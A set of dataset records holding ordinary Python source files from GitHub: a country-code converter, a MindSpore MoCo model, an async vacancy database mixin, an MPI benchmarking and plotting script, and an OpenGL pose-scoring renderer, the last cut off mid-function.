+{"seq_id":"74275036142","text":"import csv\nimport os\nimport re\n\ntry:\n    import polars as pl\nexcept ImportError:\n    pl = None\ntry:\n    import pandas as pd\nexcept ImportError:\n    pd = None\n\npkg_dir, pkg_filename = os.path.split(__file__)\ndata_path = os.path.join(pkg_dir, \"data\", \"codelist.csv\")\n\nwith open(data_path) as f:\n    rows = csv.reader(f)\n    codelist = {col[0]: list(col[1:]) for col in zip(*rows)}\n\n\ndef countrycode(sourcevar=[\"DZA\", \"CAN\"], origin=\"iso3c\", destination=\"country.name.en\"):\n    \"\"\"\n    Convert country codes or names from one format to another.\n\n    This function takes a list, string, or Polars Series of country codes or names, and converts them to the desired\n    format, such as ISO 3-letter codes, country names in different languages, etc.\n\n    Parameters:\n        sourcevar (list, str, or polars.series.series.Series, optional):\n            A list, string, or Polars Series of country codes or names to be converted. Default is ['DZA', 'CAN'].\n        origin (str, optional):\n            The format of the input country codes or names. Default is 'iso3c'.\n        destination (str, optional):\n            The desired format of the output country codes or names. Default is 'country.name.en'.\n\n    Returns:\n        list, str, or polars.series.series.Series:\n            The converted country codes or names in the desired format. The output type depends on the input type:\n            - If `sourcevar` is a string or int, returns a string.\n            - If `sourcevar` is a list, returns a list.\n            - If `sourcevar` is a Polars Series, returns a Polars Series.\n\n    Raises:\n        ValueError:\n            If the `origin` or `destination` format is not one of the supported formats.\n            If the input `sourcevar` is not a string, list, or Polars Series.\n\n    Example:\n        >>> countrycode(['DZA', 'CAN'], origin='iso3c', destination='country.name.en')\n        ['Algeria', 'Canada']\n\n    Note:\n        This function uses two helper functions (`replace_regex` and `replace_exact`) to perform the actual conversion.\n    \"\"\"\n\n    # user convenience shortcuts\n    if origin == \"country.name\":\n        origin = \"country.name.en.regex\"\n\n    if origin in [\"country.name.en\", \"country.name.fr\", \"country.name.de\", \"country.name.it\"]:\n        origin = origin + \".regex\"\n\n    if destination == \"country.name\":\n        destination = \"country.name.en\"\n\n    if destination not in codelist.keys():\n        raise ValueError(\"destination must be one of: \" + \", \".join(codelist.keys()))\n\n    valid = [\n        \"cctld\",\n        \"country.name\",\n        \"country.name.de\",\n        \"country.name.fr\",\n        \"country.name.it\",\n        \"cowc\",\n        \"cown\",\n        \"dhs\",\n        \"ecb\",\n        \"eurostat\",\n        \"fao\",\n        \"fips\",\n        \"gaul\",\n        \"genc2c\",\n        \"genc3c\",\n        \"genc3n\",\n        \"gwc\",\n        \"gwn\",\n        \"imf\",\n        \"ioc\",\n        \"iso2c\",\n        \"iso3c\",\n        \"iso3n\",\n        \"p5c\",\n        \"p5n\",\n        \"p4c\",\n        \"p4n\",\n        \"un\",\n        \"un_m49\",\n        \"unicode.symbol\",\n        \"unhcr\",\n        \"unpd\",\n        \"vdem\",\n        \"wb\",\n        \"wb_api2c\",\n        \"wb_api3c\",\n        \"wvs\",\n        \"country.name.en.regex\",\n        \"country.name.de.regex\",\n        \"country.name.fr.regex\",\n        \"country.name.it.regex\",\n    ]\n    if origin not in valid:\n        raise ValueError(\"origin must be one of: \" + \", \".join(valid))\n\n    sourcevar_series = sourcevar\n    if pl:\n        if isinstance(sourcevar, pl.series.series.Series):\n            sourcevar_series = sourcevar.to_list()\n    if pd:\n        if isinstance(sourcevar, pd.Series):\n            sourcevar_series = sourcevar.to_list()\n    if isinstance(sourcevar, str):\n        sourcevar_series = [sourcevar]\n\n    # conversion\n    if origin in [\n        \"country.name.en.regex\",\n        \"country.name.fr.regex\",\n        \"country.name.de.regex\",\n        \"country.name.it.regex\",\n    ]:\n        out = replace_regex(sourcevar_series, origin, destination)\n    else:\n        out = replace_exact(sourcevar_series, origin, destination)\n\n    # output type\n    if isinstance(sourcevar, str) or isinstance(sourcevar, int):\n        return out[0]\n    elif pl and isinstance(sourcevar, pl.series.series.Series):\n        return pl.Series(out)\n    elif pd and isinstance(sourcevar, pd.Series):\n        return pd.Series(out)\n    else:\n        return out\n\n\ndef get_first_match(pattern, string_list):\n    for string in string_list:\n        match = pattern.search(string)\n        if match:\n            return match.group()\n    return None\n\n\ndef replace_exact(sourcevar, origin, destination):\n    out = []\n    for string in sourcevar:\n        match_found = False\n        for position, origin_i in enumerate(codelist[origin]):\n            if origin_i == \"\" or codelist[destination][position] == \"\":\n                continue\n            if string == origin_i:\n                if codelist[destination][position].isdigit():\n                    out.append(int(codelist[destination][position]))\n                else:\n                    out.append(codelist[destination][position])\n                match_found = True\n                break\n        if not match_found:\n            out.append(None)\n    return out\n\n\ndef replace_regex(sourcevar, origin, destination):\n    sourcevar_unique = list(set(sourcevar))\n    o = []\n    d = []\n    for val_origin, val_destination in zip(codelist[origin], codelist[destination]):\n        if val_origin != \"\" and val_destination != \"\":\n            o.append(re.compile(val_origin, flags=re.IGNORECASE))\n            d.append(val_destination)\n\n    result = []\n    for string in sourcevar_unique:\n        match_found = False\n        for position, regex in enumerate(o):\n            if re.search(regex, string):\n                result.append(d[position])\n                match_found = True\n                break\n        if not match_found:\n            result.append(None)\n    mapping = dict(zip(sourcevar_unique, result))\n    out = [int(mapping[i]) if mapping[i] and mapping[i].isdigit() else mapping[i] for i in sourcevar]\n    return out\n","repo_name":"vincentarelbundock/pycountrycode","sub_path":"countrycode/countrycode.py","file_name":"countrycode.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"42154602325","text":"# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"MoCo model.\"\"\"\n\nimport mindspore\nfrom mindspore import Tensor\nimport mindspore.nn as nn\nimport mindspore.ops as ops\n\nfrom model.resnet_util import ResNet18, BasicBlock\n\n\nclass ModelMoCo(nn.Cell):\n \"\"\"MoCo model based on ResNet18.\"\"\"\n def __init__(self, i=4096, m=0.01, t=0.1, symmetric=True):\n super(ModelMoCo, self).__init__()\n\n self.i = i\n self.m = m\n self.t = t\n self.symmetric = symmetric\n\n # create the encoders\n self.encoder_q = ResNet18(BasicBlock, [2, 2, 2, 2], 128)\n self.encoder_k = ResNet18(BasicBlock, [2, 2, 2, 2], 128)\n\n for param_q, param_k in zip(self.encoder_q.trainable_params(), self.encoder_k.trainable_params()):\n param_k = param_q.clone()\n param_k.requires_grad = False\n\n self.queue = mindspore.Parameter(ops.Zeros()((128, 4096), mindspore.float32), name=\"queue\", requires_grad=False)\n self.queue = ops.L2Normalize(axis=0)(self.queue)\n self.queue_ptr = mindspore.Parameter(ops.Zeros()(1, mindspore.float32), name=\"queue_ptr\", requires_grad=False)\n\n def _momentum_update_key_encoder(self):\n \"\"\"Momentum update of the key encoder.\"\"\"\n for param_q, param_k in zip(self.encoder_q.trainable_params(),\n self.encoder_k.trainable_params()):\n param_k.set_data(param_k.data * (1 - self.m) + param_q.data * self.m)\n\n def _dequeue_and_enqueue(self, keys):\n \"\"\"encoding and decoding function.\"\"\"\n batch_size = keys.shape[0]\n\n ptr = int(self.queue_ptr)\n\n self.queue[:, ptr:ptr + batch_size] = keys.T\n ptr = (ptr + batch_size) % self.i\n\n self.queue_ptr[0] = ptr\n\n @staticmethod\n def _batch_shuffle_single_gpu(x):\n \"\"\"batch shuffle is used for multi gpu simulation.\"\"\"\n\n # random shuffle index\n n_x = Tensor([x.shape[0]], dtype=mindspore.int32)\n randperm = ops.Randperm(max_length=x.shape[0], pad=-1)\n idx_shuffle = randperm(n_x)\n n_2 = ops.Cast()(idx_shuffle, mindspore.float32)\n\n # index for restoring\n idx_unshuffle_2 = ops.Sort()(n_2)\n idx_unshuffle = idx_unshuffle_2[1]\n\n return x[idx_shuffle], idx_unshuffle\n\n @staticmethod\n def _batch_unshuffle_single_gpu(x, idx_unshuffle):\n \"\"\"Undo batch shuffle is used for multi gpu simulation.\"\"\"\n\n return x[idx_unshuffle]\n\n def infonce_loss(self, im_q, im_k):\n \"\"\"InfoNCE loss function.\"\"\"\n # compute query features\n q = self.encoder_q(im_q)\n q = ops.L2Normalize(axis=1)(q)\n\n # compute key features\n im_k_, idx_unshuffle = ModelMoCo._batch_shuffle_single_gpu(im_k)\n\n k = self.encoder_k(im_k_)\n k = ops.L2Normalize(axis=1)(k)\n\n # undo shuffle\n k = ModelMoCo._batch_unshuffle_single_gpu(k, idx_unshuffle)\n k = ops.stop_gradient(k)\n\n einsum0 = ops.ReduceSum()(q * k, -1)\n l_pos = ops.ExpandDims()(einsum0, -1)\n\n # negative logits: NxK\n l_neg = ops.MatMul()(q, self.queue)\n\n # logits: Nx(1+K)\n logits = ops.Concat(axis=1)((l_pos, l_neg))\n logits_n = ops.Cast()(logits, mindspore.float32)\n\n # apply temperature\n logits_x = logits_n / self.t\n\n # labels: 
positive key indicators\n        labels_n = ops.Zeros()((logits.shape[0]), mindspore.int32)\n        labels = ops.Cast()(labels_n, mindspore.int32)\n\n        # Calculate the InfoNCE loss; gradients must flow through the query\n        # encoder, so the loss itself is not detached (the key embeddings k\n        # were already detached with stop_gradient above)\n        loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')(logits_x, labels)\n\n        return loss, k\n\n    def construct(self, im1, im2):\n        \"\"\"\n        Input:\n            im_q: a batch of query images\n            im_k: a batch of key images\n        Output:\n            loss\n        \"\"\"\n        self._momentum_update_key_encoder()\n\n        # compute loss\n        if self.symmetric:\n            loss_12, k2 = self.infonce_loss(im1, im2)\n            loss_21, k1 = self.infonce_loss(im2, im1)\n            loss = loss_12 + loss_21\n            k = ops.Concat(axis=0)((k1, k2))\n        else:\n            loss, k = self.infonce_loss(im1, im2)\n        self._dequeue_and_enqueue(k)\n\n        return loss\n","repo_name":"mindspore-courses/applications","sub_path":"MoCo/src/model/moco.py","file_name":"moco.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
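The _momentum_update_key_encoder in the record above blends 99% of the old key weights with 1% of the query weights at each step (m = 0.01 is the update rate, so 1 - m is the momentum). A plain-NumPy sanity check of that arithmetic, purely illustrative and independent of MindSpore:

import numpy as np

m = 0.01
k = np.array([1.0, 0.0])   # key-encoder weight before the update
q = np.array([0.0, 1.0])   # query-encoder weight

k = k * (1 - m) + q * m    # same rule as the momentum update above
print(k)                   # [0.99 0.01] -- keys drift slowly toward q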
+{"seq_id":"34901940159","text":"from typing import List, Optional\nfrom sqlalchemy import select\nfrom ..models import Vacancy, Audience\nfrom ..types import DAOVacancyData, AudienceEnum\nfrom geopy.distance import geodesic as GD\nfrom operator import attrgetter\n\n\nclass DAOVacancyMixin:\n    sql_manager = None\n\n    async def get_vacancy_by_id(self, vacancy_id: int) -> Optional[DAOVacancyData]:\n        \"\"\"\n        Return a single vacancy by its id, or None if it does not exist.\n        :param vacancy_id:\n        :return:\n        \"\"\"\n        await self.sql_manager.create_async_session()\n        async with self.sql_manager.async_session() as session:\n            async with session.begin():\n                stmt = select(Vacancy).where(Vacancy.id == vacancy_id).where(\n                    Vacancy.deleted_at.is_(None))\n                result = await session.scalars(stmt)\n                vacancy = result.first()\n                if vacancy is None:\n                    return None\n\n                vacancy_data = DAOVacancyData(\n                    employer_id=vacancy.employer_id,\n                    audience_id=vacancy.audience_id,\n                    name=vacancy.name,\n                    work_schedule=vacancy.work_schedule,\n                    employment=vacancy.employment,\n                    salary=vacancy.salary,\n                    geolocation=vacancy.geolocation,\n                    is_open=vacancy.is_open,\n                    date_start=vacancy.date_start,\n                    date_end=vacancy.date_end\n                )\n                vacancy_data.id = vacancy.id\n                return vacancy_data\n\n    async def get_vacancy_by_geolocation(self, longitude: float = None, latitude: float = None) -> List[DAOVacancyData]:\n        \"\"\"\n        Return the list of vacancies for the given longitude and latitude\n        within a certain radius (the radius could later be moved into the\n        config and read from there).\n        Vacancies are sorted by increasing distance from the candidate, so\n        the closest ones are shown first.\n\n        TODO: introduce a dataclass for latitude/longitude, and one for\n        vacancies as well.\n\n        :param longitude:\n        :param latitude:\n        :return:\n        \"\"\"\n        vacancies_list = []\n        await self.sql_manager.create_async_session()\n        async with self.sql_manager.async_session() as session:\n            async with session.begin():\n                stmt = select(Vacancy).where(Vacancy.deleted_at.is_(None))\n                vacancies = await session.scalars(stmt)\n\n                for vacancy in vacancies.unique():\n                    vacancy_data = DAOVacancyData(\n                        employer_id=vacancy.employer_id,\n                        audience_id=vacancy.audience_id,\n                        name=vacancy.name,\n                        work_schedule=vacancy.work_schedule,\n                        employment=vacancy.employment,\n                        salary=vacancy.salary,\n                        geolocation=vacancy.geolocation,\n                        is_open=vacancy.is_open,\n                        date_start=vacancy.date_start,\n                        date_end=vacancy.date_end,\n                    )\n\n                    if longitude and latitude:\n                        # NOTE: geopy's geodesic expects \"latitude, longitude\"\n                        # ordering, so the stored geolocation strings must use\n                        # the same ordering as the string built here.\n                        candidate_geolocation = f\"{longitude}, {latitude}\"\n                        vacancy_geolocation = vacancy.geolocation\n                        distance_from_candidate_to_vacancy = GD(candidate_geolocation, vacancy_geolocation).km\n                        vacancy_data.distance_from_candidate_to_vacancy = distance_from_candidate_to_vacancy\n                    vacancy_data.id = vacancy.id\n                    vacancies_list.append(vacancy_data)\n\n        if longitude and latitude:\n            vacancies_list = sorted(vacancies_list, key=attrgetter(\"distance_from_candidate_to_vacancy\"))\n\n        return vacancies_list\n\n    async def insert_vacancy(self, vacancy: DAOVacancyData) -> None:\n        await self.sql_manager.create_async_session()\n        async with self.sql_manager.async_session() as session:\n            async with session.begin():\n                stmt = select(Vacancy).filter_by(**vacancy.__dict__)\n                result = await session.scalar(stmt)\n\n                if not result:\n                    session.add(Vacancy(**vacancy.__dict__))\n                # the session.begin() block commits on exit\n\n    async def get_audience_id_by_name(self, name: AudienceEnum) -> int:\n        await self.sql_manager.create_async_session()\n        async with self.sql_manager.async_session() as session:\n            async with session.begin():\n                audience = await session.scalar(select(Audience).filter_by(name=name))\n                return audience.id\n","repo_name":"Polovnevya/GBDEV1","sub_path":"db/mixins/vacancy.py","file_name":"vacancy.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
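One detail worth pinning down in get_vacancy_by_geolocation above: geopy's geodesic takes coordinate pairs with latitude first, so the candidate string and the stored vacancy geolocations must agree on ordering. A quick standalone check (the city coordinates are illustrative):

from geopy.distance import geodesic as GD

moscow = (55.7558, 37.6173)         # (latitude, longitude)
petersburg = (59.9311, 30.3609)

print(round(GD(moscow, petersburg).km))   # roughly 634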
+{"seq_id":"12718502766","text":"#!/usr/bin/python3\n\nimport getopt, sys\nimport re\nimport os\nimport subprocess\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfasta_file = '../allChromosomes_pretty.fa'\n\nseq = {\n 'program_name': './sequence-translator',\n 'time_tokens': ['Final reading time:', 'Final computation time:', 'Final writing time:', 'Final total time:']\n}\n\n# OPT for Optimized, uses both MPI and OMP\nopt = {\n 'program_name': 'sequence-translatorOPT',\n 'time_tokens': ['Final reading time:', 'Final computation time:', 'Final writing time:', 'Final total time:']\n}\n\ndef plot_multi(data, cols=None, spacing=.1, **kwargs):\n\n from pandas import plotting\n\n # Get default color style from pandas - can be changed to any other color list\n if cols is None: cols = data.columns\n if len(cols) == 0: return\n colors = ['red', 'green', 'blue']\n\n # First axis\n ax = data.loc[:, cols[0]].plot(kind='scatter', label=cols[0], color=colors[0], **kwargs)\n ax.set_ylabel(ylabel=cols[0])\n lines, labels = ax.get_legend_handles_labels()\n\n for n in range(1, len(cols)):\n # Multiple y-axes\n ax_new = ax.twinx()\n ax_new.spines['right'].set_position(('axes', 1 + spacing * (n - 1)))\n data.loc[:, cols[n]].plot(kind='scatter', ax=ax_new, label=cols[n], color=colors[n % len(colors)], **kwargs)\n ax_new.set_ylabel(ylabel=cols[n])\n ax_new.set_ylim([0, data.loc[:, cols[n]].max()])\n\n # Proper legend position\n line, label = ax_new.get_legend_handles_labels()\n lines += line\n labels += label\n\n ax.legend(lines, labels, loc=0)\n ax.set_xlabel(\"Iteration\")\n return ax\n\n# [program] Dict\ndef collect_data(program, cores, multi=False):\n thread_mean_dicts = []\n\n exec_args = [program['program_name'], fasta_file, '../out.fa']\n # Launch across multiple machines if multi\n if multi:\n exec_args = ['mpirun', '-np', str(cores), '--hostfile', 'h2', '--mca', 'btl_tcp_if_include', 'eno1'] + exec_args\n else:\n exec_args = ['mpirun', '-np', str(cores)] + exec_args\n\n \n #for threads in range(1, 9):\n # print(\"Threads:\", threads)\n # os.environ['OMP_NUM_THREADS'] = str(threads)\n \n results = []\n for i in range(3): \n print(exec_args)\n output = subprocess.run(exec_args, capture_output=True).stdout.decode('utf-8')\n print(\"OUTPUT\", output)\n\n times = [] # Each elem is one time per exec\n for token in program['time_tokens']:\n print('Searching for', '(<=' + token + ').\\S*')\n result = re.search('(?<=' + token + ').\\S*', output).group(0).strip()\n print(token, result)\n times.append(float(result))\n results.append(times)\n \n print(results) \n# print(\"Results for\", threads, \"threads:\")\n # zip(*) creates array of arrays where each array is a type of time, i.e. 
total time\n print(\"zip results:\", list(zip(*results)))\n means_dict = {}\n for time_type, time_list in zip(program['time_tokens'], list(zip(*results))):\n time_list = list(time_list)\n print(time_type, ':', time_list)\n time_list.remove(max(time_list))\n time_list.remove(min(time_list))\n mean = sum(time_list)/len(time_list)\n means_dict[time_type] = mean; \n\n print(\"Final means dict\", means_dict)\n return means_dict \n\n# [program] Dict\ndef collect_seq_data(program):\n results = []\n for i in range(3): \n output = subprocess.run([program['program_name'], '../allChromosomes_pretty.fa', '../out.fa'], capture_output=True).stdout.decode('utf-8')\n times = [] # An array where each element is one time per execution\n for token in program['time_tokens']:\n print('OUTPUT:', output)\n print('Searching for', '(<=' + token + ').\\S*')\n result = re.search('(?<=' + token + ').\\S*', output).group(0).strip()\n print(token, result, 'actual result:', result[:-1])\n times.append(float(result[:-1]))\n results.append(times)\n print(\"Seq times:\", results)\n\n times_dict = {}\n # zip(*) creates array of arrays where each array is a type of time, i.e. total time\n for time_type, time_list in zip(program['time_tokens'], zip(*results)): \n time_list = list(time_list)\n print(time_type, ':', time_list)\n time_list.remove(max(time_list))\n time_list.remove(min(time_list))\n mean = sum(time_list)/len(time_list)\n times_dict[time_type] = mean;\n\n print(\"Final seq results\", times_dict)\n return times_dict\n\n\n# Returns [(threads, {'time_token': speedup, ...}), ...]\ndef calculate_speedup(baseline_means, test_times):\n speedup_dict = {}\n print(baseline_means, test_times)\n\n # datum = (threads, {token_string: mean_time, ...})\n print(\"test_times:\", test_times)\n for key, val in test_times.items():\n speedup = baseline_means[key] / val * 100\n speedup_dict[key] = speedup\n\n print(\"Final speedups:\", speedup_dict)\n return speedup_dict\n\n# collect_seq_data\n# returns {'time_token': mean_time, ...}\n# i.e., a dict of key-value pairs\n# each key is a value from program['time_types']\n# value for each key is mean execution time\nseq_means = collect_seq_data(seq)\n\n# Execute on one machine with 6 cores\nopt6_results = collect_data(opt, 6, False)\n# Execute using host file and 12 cores\nopt12_results = collect_data(opt, 12, True)\n\n# List of tuples where each tuple is (threads, {'time_token': speedup, ...})\nopt6_speedups = calculate_speedup(seq_means, opt6_results)\nopt12_speedups = calculate_speedup(seq_means, opt12_results)\n\"\"\"\nopt6_data = pd.DataFrame({\n \"Reading Time\": opt6_speedups['Final reading time:'],\n \"Computation Time\": opt6_speedups['Final computation time:'], \n \"Writing Time\": opt6_speedups['Final writing time:'], \n \"Total Time\": opt6_speedups['Final total time:']\n})\n\n\nopt12_data = pd.DataFrame({\n \"Reading Time\": opt12_speedups['Final reading time:'],\n \"Computation Time\": opt12_speedups['Final computation time:'], \n \"Writing Time\": opt12_speedups['Final writing time:'], \n \"Total Time\": opt12_speedups['Final total time:'] \n})\n\"\"\"\n\nfilename = 'Translator'\n\n# ['Reading time:', 'Computation time:', 'Writing time:', 'Total time:']\n\n\nfig = plt.figure()\nplt.title('OPT6 vs OPT12 Speedups')\nax = fig.add_subplot(111)\nX = np.arange(4)\nopt6 = [value for _,value in opt6_speedups.items()] \nopt12 = [value for _,value in opt12_speedups.items()] \np1 = plt.bar(X + 0.00, opt6, color = 'b', width = 0.25)\np2 = plt.bar(X + 0.25, opt12, color = 'g', width = 
0.25)\n\n \n#ax.scatter(opt6_, opt6_data['Reading Time'], label = 'Reading Time')\n#ax.scatter(opt6_data['Threads'], opt6_data['Computation Time'], label = 'Computation Time')\n#ax.scatter(opt6_data['Threads'], opt6_data['Writing Time'], label = 'Writing Time')\n\n#ax.scatter(opt6_data['Threads'], opt6_data['Total Time'], label = 'Total Time')\n#plt.xlabel('Threads')\nplt.ylabel('Speedup (%)')\nplt.xlabel('Time Metric')\nplt.xticks(X, ('Reading Time', 'Computation Time', 'Writing Time', 'Total Time'))\nplt.legend((p1[0], p2[0]), ('OPT6', 'OPT12'))\nplt.savefig('opt-results.png')\n\n#fig = plt.figure()\n#ax = fig.add_subplot(111)\n#plt.title('Speedup SEQ vs OPT12')\n#ax.scatter(opt12_data['Threads'], opt12_data['Reading Time'], label = 'Reading Time')\n#ax.scatter(opt12_data['Threads'], opt12_data['Computation Time'], label = 'Computation Time')\n#ax.scatter(opt12_data['Threads'], opt12_data['Writing Time'], label = 'Writing Time')\n\n#ax.scatter(opt12_data['Threads'], opt12_data['Total Time'], label = 'Total Time')\n#plt.xlabel('Threads')\n#plt.ylabel('Speedup (%)')\n#plt.legend()\n#plt.savefig('opt12-results.png')\n\nplt.show() \n\n","repo_name":"MatthewJMoreno/TranslateRNAtoProtien","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
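Both collectors in the benchmarking script above aggregate the three timing runs the same way: discard the single slowest and fastest run, then average what remains. Factoring that into one helper would remove the duplication; a sketch (the helper name is my own):

def trimmed_mean(times):
    # Same aggregation as collect_data/collect_seq_data: drop one max
    # and one min, then average whatever is left.
    times = list(times)
    times.remove(max(times))
    times.remove(min(times))
    return sum(times) / len(times)

print(trimmed_mean([3.0, 1.0, 2.0]))   # 2.0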
+{"seq_id":"37064796920","text":"import OpenGL\nOpenGL.ERROR_CHECKING = False\nimport OpenGL.GL as gl\nfrom glumpy import gloo, app\napp.use('glfw')\nimport numpy as np\nimport os\n\n\nclass Model:\n\n _idx_offset = 0 # offset added to indices in index buffer to address joint vertex buffer correctly\n\n def __init__(self, mesh=None):\n\n if mesh is not None:\n # load using trimesh\n # mesh = mesh.apply_scale(1/1000) # to meters\n pts = mesh.vertices.view(np.ndarray).astype(np.float32)\n if not hasattr(mesh.visual, \"uv\"):\n texture_uv = np.zeros((pts.shape[0], 2))\n else:\n texture_uv = mesh.visual.uv.view(np.ndarray).astype(np.float32)\n faces = mesh.faces.view(np.ndarray).astype(np.uint32).reshape(-1,)\n\n # extend vertices to faces size - allows to fix models with broken normal information\n pts = pts[faces]\n normals = np.asarray([[fn, fn, fn] for fn in mesh.face_normals]).reshape(-1, 3)\n texture_uv = texture_uv[faces]\n faces = np.arange(pts.shape[0])\n\n # prepare buffers -- we use a single VBO, thus indices need to be offset\n vertices_type = [('a_position', np.float32, 3),\n ('a_normal', np.float32, 3),\n ('a_texcoord', np.float32, 2)]\n\n self.vertex_buffer = np.array(list(zip(pts, normals, texture_uv)), vertices_type)\n self.index_buffer = (faces.flatten().astype(np.uint32) + Model._idx_offset).view(gloo.IndexBuffer)\n\n Model._idx_offset += self.vertex_buffer.shape[0]\n else:\n self.vertex_buffer, self.index_buffer = None, None\n\n # model space offset\n self.mat_offset = np.eye(4)\n self.mat_offset[:3, :3] = np.diag([1/1000]*3) # to meters\n\n def draw(self, program):\n program.draw(gl.GL_TRIANGLES, self.index_buffer)\n\n\nclass ScreenQuad(Model):\n\n def __init__(self):\n Model.__init__(self)\n pts = np.array([\n [-1, -1, 0],\n [ 1, -1, 0],\n [ 1, 1, 0],\n [-1, 1, 0]\n ]).astype(np.float32)\n normals = np.array([[0, 0, 1]]*4).astype(np.float32)\n uvs = np.array([[0, 1], [1, 1], [1, 0], [0, 0]]).astype(np.float32)\n faces = np.array([[0, 2, 3], [0, 1, 2]]).astype(np.uint32).reshape(-1)\n\n vertices_type = [('a_position', np.float32, 3),\n ('a_normal', np.float32, 3),\n ('a_texcoord', np.float32, 2)]\n vertices = np.array(list(zip(pts, normals, uvs)), vertices_type)\n\n # prepare buffers -- we use a single VBO, thus indices need to be offset\n self.vertex_buffer = vertices\n self.index_buffer = (faces.astype(np.uint32) + Model._idx_offset).view(gloo.IndexBuffer)\n\n Model._idx_offset += vertices.shape[0]\n\n\nclass Renderer:\n\n def __init__(self, meshes, width=640, height=480):\n self.width, self.height = width, height\n self.near, self.far = 0.01, 5.0 # in meters\n self.window = app.Window(width, height, visible=False)\n\n # FBOs: one per stage\n self.normal_depth_buf = np.zeros((height, width, 4), np.float32).view(gloo.TextureFloat2D)\n self.depth_buf = np.zeros((height, width), np.float32).view(gloo.DepthTexture)\n self.fbo_stage_1 = gloo.FrameBuffer(color=self.normal_depth_buf, depth=self.depth_buf)\n\n self.cost_buf = np.zeros((height, width, 4), np.float32).view(gloo.TextureFloat2D)\n self.fbo_stage_2 = gloo.FrameBuffer(color=self.cost_buf)\n\n # load models\n self.models = [Model(mesh) for mesh in meshes]\n self.models.append(ScreenQuad()) # used for stage 2\n\n # VBO: one for all models - bind once, draw according to model indices\n self.vertex_buffer = np.hstack([model.vertex_buffer for model in self.models]).view(gloo.VertexBuffer)\n for model in self.models:\n model.vertex_buffer = self.vertex_buffer\n\n # shader\n basepath = 
os.path.dirname(os.path.abspath(__file__))\n with open(f\"{basepath}/score.vert\", 'r') as file:\n shader_vertex = \"\".join(file.readlines())\n with open(f\"{basepath}/score.frag\", 'r') as file:\n shader_fragment = \"\".join(file.readlines())\n self.program = gloo.Program(shader_vertex, shader_fragment)\n self.program['u_texture'] = np.zeros((512, 512, 3), np.float32)\n self.program.bind(self.vertex_buffer) # is bound once -- saves some time\n\n # self.fbo_stage_1.activate()\n gl.glViewport(0, 0, self.width, self.height)\n gl.glClearColor(0.0, 0.0, 0.0, 0.0)\n gl.glEnable(gl.GL_DEPTH_TEST)\n\n self.observation = None\n self.set_observation(np.zeros((height, width, 1)), np.zeros((height, width, 3)))\n\n def set_observation(self, observation_d, observation_n):\n if self.observation is not None:\n self.observation.delete()\n self.observation_np = np.dstack([observation_n, observation_d/1000]).astype(np.float32)\n self.observation = (np.dstack([observation_n, observation_d/1000]).astype(np.float32)[::-1, :, :])\\\n .view(gloo.TextureFloat2D)\n self.program['u_observation'] = self.observation\n\n def render(self, model_ids, model_trafos, extrinsics, intrinsics, cull_back=True):\n # PREPARE RENDERING\n # compose model matrix:\n # - apply model space offset\n # - apply pose (in camera space)\n # - transform to world space\n # - transpose to be row major (OpenGL)\n mats_off = [self.models[model_id].mat_offset for model_id in model_ids]\n mats_model = [m.copy() for m in model_trafos]\n\n mat_world2cam = extrinsics.copy()\n R = mat_world2cam[:3, :3].T\n t = -R @ mat_world2cam[:3, 3]\n mat_cam2world = np.eye(4)\n mat_cam2world[:3, :3], mat_cam2world[:3, 3] = R, t\n\n mats_model = [(mat_cam2world @ mat_model @ mat_off).T for mat_model, mat_off in zip(mats_model, mats_off)]\n\n # prepare view and projection matrices (row major)\n mat_view = self._compute_view(mat_cam2world) # gl view matrix from camera matrix\n mat_proj = self._compute_proj(intrinsics) # projection matrix\n mat_view_proj = mat_view @ mat_proj # view-projection matrix\n\n # STAGE 1) compute \\hat{d}_T and \\hat{n}_T: render model under estimated pose\n self.fbo_stage_1.activate()\n gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)\n if not cull_back:\n gl.glDisable(gl.GL_CULL_FACE) # fixes rendering of single-sided lamp mesh in LINEMOD\n self.program['u_mode'] = 0\n\n for i, (model_id, m) in enumerate(zip(model_ids, mats_model)):\n self.program['u_mv'] = m @ mat_view\n self.program['u_mvp'] = m @ mat_view_proj\n\n try:\n model = self.models[model_id]\n model.draw(self.program)\n except ValueError as _:\n print(\"failed to draw\")\n return 0\n if not cull_back:\n gl.glEnable(gl.GL_CULL_FACE) # enable again for rendering other stuff\n\n buffer = np.zeros((self.height, self.width, 4), dtype=np.float32)\n gl.glReadPixels(0, 0, self.width, self.height, gl.GL_RGBA, gl.GL_FLOAT, buffer)\n buffer.shape = self.height, self.width, 4\n buffer = buffer[::-1]\n return buffer[..., 3], buffer[..., :3] # depth and normals\n\n def compute_score(self, model_ids, model_trafos, extrinsics, intrinsics, cull_back=True, return_map=False,\n use_normals=True):\n # PREPARE RENDERING\n\n # compose model matrix:\n # - apply model space offset\n # - apply pose (in camera space)\n # - transform to world space\n # - transpose to be row major (OpenGL)\n mats_off = [self.models[model_id].mat_offset for model_id in model_ids]\n mats_model = [m.copy() for m in model_trafos]\n\n mat_world2cam = extrinsics.copy()\n R = mat_world2cam[:3, :3].T\n t = -R @ 
